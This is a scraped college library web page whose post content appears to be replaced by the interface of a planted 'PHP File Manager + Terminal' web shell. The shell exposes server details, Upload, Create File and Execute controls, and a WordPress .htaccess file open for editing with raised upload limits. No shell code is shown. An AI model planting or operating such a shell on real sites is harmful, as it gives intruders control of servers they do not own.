Looking for something? Use OneSearch! Posted on January 23, 2020 (February 3, 2025) by Rebecca Hyams PHP File Manager + Terminal PHP File Manager + TerminalServer: www.bmcc.cuny.eduSoftware: Apache/2.4.62 (Debian)Current directory: //var/www/html/sfac Upload Create File Create Folder Execute Editing: /var/www/html/sfac/local.htaccess # BEGIN WordPress # The directives (lines) between `BEGIN WordPress` and `END WordPress` are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. <IfModule mod_rewrite.c> RewriteEngine On RewriteBase /wordpress_production/sfac/ RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /wordpress_production/sfac/index.php [L] </IfModule> <IfModule mod_php7.c> php_value post_max_size 1024M php_value upload_max_filesize 1024M php_value memory_limit 512M php_value max_execution_time 3000 php_value max_input_time 3000 php_value session.gc_maxlifetime 3000 </IfModule> # END WordPressSave